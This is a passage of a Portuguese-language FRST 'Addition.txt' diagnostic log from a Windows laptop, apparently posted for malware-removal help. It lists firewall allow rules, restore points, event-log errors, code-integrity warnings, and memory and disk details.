[{004A8A35-F266-44B4-840A-412121AF239A}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{EEAB544E-150E-4743-8F22-ADBC14B6E558}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{589BE9AE-E44C-484D-A166-4CB7AD4947B6}] => (Allow) C:\suprema\Suprema Empresarial 1056.exe FirewallRules: [{837726A5-5762-49AD-A385-21483740ABBC}] => (Allow) C:\suprema\Suprema Empresarial 1056.exe FirewallRules: [{BFC2BC89-48FE-42CF-A13B-01AD1D4AD390}] => (Allow) C:\suprema\Suprema Empresarial 1056.exe FirewallRules: [{D719D2CE-AECF-457A-ACFB-29BCDBF6C750}] => (Allow) C:\suprema\Suprema Empresarial 1056.exe FirewallRules: [{4D7DD3FD-83AA-40D5-8338-E907E64F6BF8}] => (Allow) C:\suprema\RegAsm.exe FirewallRules: [{2479AC84-85F1-4305-B80E-22AE75F1012E}] => (Allow) C:\suprema\RegAsm.exe FirewallRules: [{9AFAAFAF-5C7C-4E29-BD63-3E0231C3DD67}] => (Allow) C:\suprema\RegAsm.exe FirewallRules: [{C2D729AD-7823-4CD5-8789-269A4A2E97FD}] => (Allow) C:\suprema\RegAsm.exe FirewallRules: [{87B7D974-1198-47F1-BC81-3D21B493A4DA}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\isql.exe FirewallRules: [{5D7C086A-3927-4ED6-B432-F1A41EE1E83D}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\isql.exe FirewallRules: [{829A8B2B-51C5-41E3-A043-E05FDEEB5826}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\isql.exe FirewallRules: [{B3A04FEA-A844-42ED-A765-460D7502585E}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\isql.exe FirewallRules: [{00AA5953-787E-4F87-A6B6-0299F1CFAE9B}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\fbguard.exe FirewallRules: [{07F032DB-566F-4FE4-B8E0-19DD2EE536B3}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\fbguard.exe FirewallRules: [{0D2B660A-E054-4A8E-B41F-F2769F0CE219}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\fbguard.exe FirewallRules: [{D7C1E0A1-5999-45C0-BDAC-66C384617AAB}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_1_5\bin\fbguard.exe FirewallRules: [{551701A0-890E-4447-B052-FFF0AFED13BD}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe FirewallRules: [{F77D2875-2EC3-4082-B289-92A67BE77E0A}] => (Allow) LPort=5357 FirewallRules: [{D74FA41E-BE1F-462B-BD5F-25C105AEE6CB}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [TCP Query User{BB4BF745-CB7C-40F7-B2C0-BD689997A840}C:\users\will\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\will\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{68012A09-F8D8-40FC-BDD4-52F88ECF7722}C:\users\will\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\will\appdata\local\akamai\netsession_win.exe FirewallRules: [{45C8429D-318E-4E9B-8D9A-7B27622C49CD}] => (Allow) LPort=50248 FirewallRules: [{2A4D97E9-C901-4FBF-A40A-386769D2902D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{9E645B2F-47E3-4085-A06D-855F2E87C1A8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{952DA5DF-4A7F-4E90-9090-D2A8292C30EC}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{0907BCD0-51CC-4B58-80B5-642D226FB147}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [TCP Query User{70234F5D-4194-4FC0-A1EB-8129C6459C9C}C:\users\will\appdata\local\apps\2.0\m2kedn66.665\1j87joot.ck6\leve..tion_277729edc54ae6cf_0000.0009_b7445b2515a9e0fa\tools\aria2-1.16.3-win-32bit-build1\aria2c.exe] => (Allow) C:\users\will\appdata\local\apps\2.0\m2kedn66.665\1j87joot.ck6\leve..tion_277729edc54ae6cf_0000.0009_b7445b2515a9e0fa\tools\aria2-1.16.3-win-32bit-build1\aria2c.exe FirewallRules: [UDP Query User{41BFD0E1-3DD2-4680-87DE-1FB5517E64C2}C:\users\will\appdata\local\apps\2.0\m2kedn66.665\1j87joot.ck6\leve..tion_277729edc54ae6cf_0000.0009_b7445b2515a9e0fa\tools\aria2-1.16.3-win-32bit-build1\aria2c.exe] => (Allow) C:\users\will\appdata\local\apps\2.0\m2kedn66.665\1j87joot.ck6\leve..tion_277729edc54ae6cf_0000.0009_b7445b2515a9e0fa\tools\aria2-1.16.3-win-32bit-build1\aria2c.exe FirewallRules: [{DB295574-69D2-428E-8E46-9802C995B08A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{C75B5F50-33E7-4FB3-8456-1194C7FD6700}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{98BE3B33-E690-4B05-A1B8-73B49F29122B}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbguard.exe FirewallRules: [{04A70468-8494-4F82-976E-1A08E9C7B7D6}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbguard.exe FirewallRules: [{2A0A2058-DEED-4BEF-B8F5-7F26C8B1DE0F}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbguard.exe FirewallRules: [{3C49FDC9-87A0-49AE-AAEA-B8491ADD93DA}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbguard.exe FirewallRules: [{9686F77F-3355-433A-8A59-806A083A6092}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbserver.exe FirewallRules: [{A940BEEC-A61D-4233-934D-8D813AD67BCF}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbserver.exe FirewallRules: [{CBFC0178-2356-498B-83E7-1A19B73EAA85}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbserver.exe FirewallRules: [{8071BA27-3970-4EB2-9259-D4C1FE830C2D}] => (Allow) C:\Program Files (x86)\Firebird\Firebird_2_5\bin\fbserver.exe FirewallRules: [{D5C999BE-505E-4902-97E8-3669CD787DCC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{76127500-890B-46CD-9A71-21D08F5E95C4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{DB49CCFD-D240-4376-A63F-87B4B49842D0}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiaupdater.exe FirewallRules: [{E12C9062-A666-49D6-BC05-C6C3845AE913}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiatunnel.exe FirewallRules: [{CEBF672C-3CE5-40C9-8691-746DAA8C7177}] => (Allow) c:\program files (x86)\tibiatunnel beta\localgamingserver.exe FirewallRules: [{A42D8C9D-058C-433E-9F31-6188172A42EF}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiatunnel.exe FirewallRules: [{AEE7FEDD-AF24-4B7D-80E7-FF79AA524F50}] => (Allow) c:\program files (x86)\tibiatunnel beta\localgamingserver.exe FirewallRules: [{CE98ED40-9BDE-46BD-BBD4-5CE0B0C97D9D}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiaupdater.exe FirewallRules: [{3E338CF7-136C-45BE-A48E-9446301A13B6}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiatunnel.exe FirewallRules: [{371F3979-2BEA-4E30-9CA8-63B71AF2DA07}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiaupdater.exe FirewallRules: [{42B49375-AF7B-4C2C-A8BE-D2B154E00A34}] => (Allow) c:\program files (x86)\tibiatunnel beta\localgamingserver.exe FirewallRules: [{4C72D4C7-9CD8-4104-AFFB-5BBEE0CDFC2D}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiaupdater.exe FirewallRules: [{2EAC5177-040A-4DF1-8205-72C3E0D24E22}] => (Allow) c:\program files (x86)\tibiatunnel beta\tibiatunnel.exe FirewallRules: [{E6776729-EF5B-426D-8909-8DEE7DEC2CAD}] => (Allow) c:\program files (x86)\tibiatunnel beta\localgamingserver.exe FirewallRules: [{A96B3B6B-040F-4719-895A-8A353C619BED}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{E04047D6-D85C-4362-9749-694D4D632952}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{9CD850E0-E4FA-4A22-BF7F-215F05BB1661}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{49235629-E7F9-4812-88AB-45CF6C8880E4}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{AC81DFE4-B19E-46B3-9265-7C72A93FA5D8}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{28DB3FE2-EF38-4A12-B0A5-8B427C7EC511}] => (Allow) C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{57644AD9-6689-4311-8E73-FECDC058445B}] => (Allow) C:\Users\Will\AppData\Local\Tibia\Tibia.exe FirewallRules: [{7BE61061-F7BF-42B8-8619-AE8F75F3F45A}] => (Allow) C:\Users\Will\AppData\Local\Tibia\Tibia.exe FirewallRules: [{5AEDFFA9-09F8-4A2E-97F4-A9338A7FDB30}] => (Allow) C:\Users\Will\AppData\Local\Tibia\Tibia.exe FirewallRules: [{D27F187C-2047-4442-B4F3-B9F404326085}] => (Allow) C:\Users\Will\AppData\Local\Tibia\Tibia.exe FirewallRules: [{167AF583-5F32-42B5-AD97-C1CC1C7B3FE1}] => (Allow) C:\Program Files (x86)\Tibia\Tibia.exe FirewallRules: [{9E08FA06-A7D9-4019-B031-BB42C75CC816}] => (Allow) C:\Program Files (x86)\Tibia\Tibia.exe FirewallRules: [{72F57E32-C9D9-4CBC-B253-B32CD2F3E267}] => (Allow) C:\Program Files (x86)\Tibia\Tibia.exe FirewallRules: [{59D97C55-3279-483F-96B1-15ADCECBCBDE}] => (Allow) C:\Program Files (x86)\Tibia\Tibia.exe FirewallRules: [{7D7BA28C-734B-43E0-BBE4-3BCE393D69BF}] => (Allow) C:\Program Files (x86)\HP\HP Deskjet 2540 series\bin\HelpViewer\hpqlpvwr.exe FirewallRules: [{760220C3-85E8-423B-87C3-9EE527C5F45A}] => (Allow) C:\Program Files (x86)\HP\HP Deskjet 2540 series\bin\HelpViewer\hpqlpvwr.exe FirewallRules: [{715C4C0A-B27E-445B-B74F-DB5FAC16F800}] => (Allow) C:\Program Files (x86)\HP\HP Deskjet 2540 series\bin\HelpViewer\hpqlpvwr.exe FirewallRules: [{EB65FB24-6F98-42AB-90A6-40D274A2A5E8}] => (Allow) C:\Program Files (x86)\HP\HP Deskjet 2540 series\bin\HelpViewer\hpqlpvwr.exe FirewallRules: [{240DD381-6757-496C-843B-A14189AC5BA4}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService_x64.exe FirewallRules: [{07DEFC37-82F9-4D9D-B444-CDD9BD6A79E3}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService_x64.exe FirewallRules: [{88F84CA3-7266-45D9-90C5-75F7D8994615}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService_x64.exe FirewallRules: [{8EEBA11E-14B5-43B7-898B-C6DF99463ECE}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService_x64.exe FirewallRules: [{8F5E8272-61F3-447E-8FF7-3BA61F0EAD04}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService.exe FirewallRules: [{F1666559-68A3-4EDF-A583-2ABA10C6BD8A}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService.exe FirewallRules: [{6ACDCEDD-C6F6-43BB-9D5E-16282A8212D2}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService.exe FirewallRules: [{57D328A0-5F1B-447E-95C8-CB9B4AD29D3D}] => (Allow) C:\Program Files (x86)\Tibia\BattlEye\BEService.exe FirewallRules: [{570EB71F-7CA6-44B6-95A8-9F7A5C635401}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe FirewallRules: [{C3C61AF4-3ABF-47AB-BB22-3EFDF110B81C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe FirewallRules: [{9008D419-7EA4-435E-B65E-1F23A8C2F86F}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DBDownloader.exe FirewallRules: [{4FC321DD-6E8D-4558-A95C-CFBEC8E8C0B7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DBDownloader.exe FirewallRules: [{8BF37036-CCEB-4C59-9242-3E19B957F14D}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\AutoUpdate.exe FirewallRules: [{8D54FB73-0201-4108-8952-73AA00050956}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.3.0\AutoUpdate.exe FirewallRules: [{0243832D-C6D3-47A2-BAF5-53494D432851}] => (Allow) c:\program files (x86)\tibiatunnel\ttlocalserver.exe FirewallRules: [{BC3B6C5B-B556-4BEE-998E-187183F05193}] => (Allow) c:\program files (x86)\tibiatunnel\ttlocalserver.exe FirewallRules: [{0379C17D-9AB0-4EDF-974C-F53905442525}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{32F13E51-DB27-4D61-AEB3-71D88A45EAD2}] => (Allow) C:\Program Files\UBar\ubar.exe FirewallRules: [{45620B73-9E33-4ADE-BEB7-D450ADCDB4D1}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.607_0\SZBrowser.exe FirewallRules: [{3F1FA732-2C98-4A46-9D8A-FB67DEBB933B}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe ==================== Pontos de Restauração ========================= 21-07-2017 11:06:21 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 21-07-2017 11:14:19 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 21-07-2017 11:15:15 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 21-07-2017 11:26:18 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 21-07-2017 11:48:29 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 21-07-2017 11:52:38 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 21-07-2017 11:53:45 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 24-07-2017 08:08:35 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 ==================== Dispositivos Apresentando Falhas No Gerenciador ============= ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (07/24/2017 08:16:36 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (07/24/2017 08:06:19 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Falha ao extrair lista raiz de terceiros do arquivo cab de atualização automática de: com erro: Um certificado necessário não está no período de validade ao ser verificado em relação à hora atual do sistema ou ao carimbo de data/hora no arquivo assinado. . Error: (07/21/2017 10:57:43 AM) (Source: HP Active Health) (EventID: 2800) (User: ) Description: Agent SystemState threw an exception: System.InvalidOperationException: Cannot load Counter Name data because an invalid index '' was read from the registry. at System.Diagnostics.PerformanceCounterLib.GetStringTable(Boolean isHelp) at System.Diagnostics.PerformanceCounterLib.get_NameTable() at System.Diagnostics.PerformanceCounterLib.get_CategoryTable() at System.Diagnostics.PerformanceCounterLib.CounterExists(String category, String counter, Boolean& categoryExists) at System.Diagnostics.PerformanceCounterLib.CounterExists(String machine, String category, String counter) at System.Diagnostics.PerformanceCounter.InitializeImpl() at System.Diagnostics.PerformanceCounter..ctor(String categoryName, String counterName, String instanceName, Boolean readOnly) at System.Diagnostics.PerformanceCounter..ctor(String categoryName, String counterName, String instanceName) at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.CpuUsage() at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.FetchValues() at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.CollectNewDataClasses(FileInfo agentStateFile, IDataClassCollector dataClassColector) at HP.ActiveHealth.API.DataGeneration.AgentRunner.QueryAgentDelegate(Object agentObj) Error: (07/21/2017 10:57:28 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (07/21/2017 10:48:10 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Falha ao extrair lista raiz de terceiros do arquivo cab de atualização automática de: com erro: Um certificado necessário não está no período de validade ao ser verificado em relação à hora atual do sistema ou ao carimbo de data/hora no arquivo assinado. . Error: (07/20/2017 02:32:08 PM) (Source: HP Active Health) (EventID: 2800) (User: ) Description: Agent SystemState threw an exception: System.InvalidOperationException: Cannot load Counter Name data because an invalid index '' was read from the registry. at System.Diagnostics.PerformanceCounterLib.GetStringTable(Boolean isHelp) at System.Diagnostics.PerformanceCounterLib.get_NameTable() at System.Diagnostics.PerformanceCounterLib.get_CategoryTable() at System.Diagnostics.PerformanceCounterLib.CounterExists(String category, String counter, Boolean& categoryExists) at System.Diagnostics.PerformanceCounterLib.CounterExists(String machine, String category, String counter) at System.Diagnostics.PerformanceCounter.InitializeImpl() at System.Diagnostics.PerformanceCounter..ctor(String categoryName, String counterName, String instanceName, Boolean readOnly) at System.Diagnostics.PerformanceCounter..ctor(String categoryName, String counterName, String instanceName) at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.CpuUsage() at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.FetchValues() at HP.ActiveHealth.Agents.SystemState.SystemStateAgent.CollectNewDataClasses(FileInfo agentStateFile, IDataClassCollector dataClassColector) at HP.ActiveHealth.API.DataGeneration.AgentRunner.QueryAgentDelegate(Object agentObj) Error: (07/20/2017 02:31:53 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (07/20/2017 02:21:42 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Falha ao extrair lista raiz de terceiros do arquivo cab de atualização automática de: com erro: Um certificado necessário não está no período de validade ao ser verificado em relação à hora atual do sistema ou ao carimbo de data/hora no arquivo assinado. . Error: (07/19/2017 10:26:43 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Falha ao extrair lista raiz de terceiros do arquivo cab de atualização automática de: com erro: Um certificado necessário não está no período de validade ao ser verificado em relação à hora atual do sistema ou ao carimbo de data/hora no arquivo assinado. . Error: (07/19/2017 07:13:46 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Falha ao extrair lista raiz de terceiros do arquivo cab de atualização automática de: com erro: Um certificado necessário não está no período de validade ao ser verificado em relação à hora atual do sistema ou ao carimbo de data/hora no arquivo assinado. . Erros de Sistema: ============= Error: (07/24/2017 08:09:33 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Não foi possível iniciar o serviço HP Support Solutions Framework Service devido ao seguinte erro: O serviço não respondeu à requisição de início ou controle em tempo hábil. Error: (07/24/2017 08:09:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço HP Support Solutions Framework Service. Error: (07/19/2017 10:12:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Não foi possível iniciar o serviço HP Support Solutions Framework Service devido ao seguinte erro: O serviço não respondeu à requisição de início ou controle em tempo hábil. Error: (07/19/2017 10:12:38 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço HP Support Solutions Framework Service. Error: (07/17/2017 07:56:25 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: O desligamento anterior do sistema em 15:40:54 às ‎17/‎07/‎2017 não era esperado. Error: (07/11/2017 01:59:18 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: O serviço TeamViewer 10 foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 2000 milissegundos: Reiniciar o serviço. Error: (07/09/2017 10:15:16 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: O desligamento anterior do sistema em 18:46:33 às ‎08/‎07/‎2017 não era esperado. Error: (07/03/2017 07:30:14 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: O desligamento anterior do sistema em 18:57:36 às ‎03/‎07/‎2017 não era esperado. Error: (07/03/2017 06:36:26 AM) (Source: EventLog) (EventID: 6008) (User: ) Description: O desligamento anterior do sistema em 18:52:18 às ‎02/‎07/‎2017 não era esperado. Error: (06/29/2017 08:58:44 AM) (Source: EventLog) (EventID: 6008) (User: ) Description: O desligamento anterior do sistema em 20:49:48 às ‎28/‎06/‎2017 não era esperado. CodeIntegrity: =================================== Date: 2016-09-21 10:44:36.378 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-09-21 10:44:36.378 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-09-20 10:38:13.104 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-09-20 10:38:13.104 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-09-08 13:50:21.552 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-08 13:50:21.303 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-07 12:31:06.568 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-07 12:31:06.334 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-07 08:48:32.275 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-07 08:48:32.056 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i5-3230M CPU @ 2.60GHz Percentagem de memória em uso: 51% RAM física total: 3991.36 MB RAM física disponível: 1953.81 MB Virtual Total: 7980.86 MB Virtual disponível: 6052.76 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:195.21 GB) (Free:96.73 GB) NTFS Drive d: () (Fixed) (Total:270.45 GB) (Free:262.26 GB) NTFS ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 76556EF0) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=195.2 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=270.4 GB) - (Type=07 NTFS) ==================== Fim de Addition.txt ============================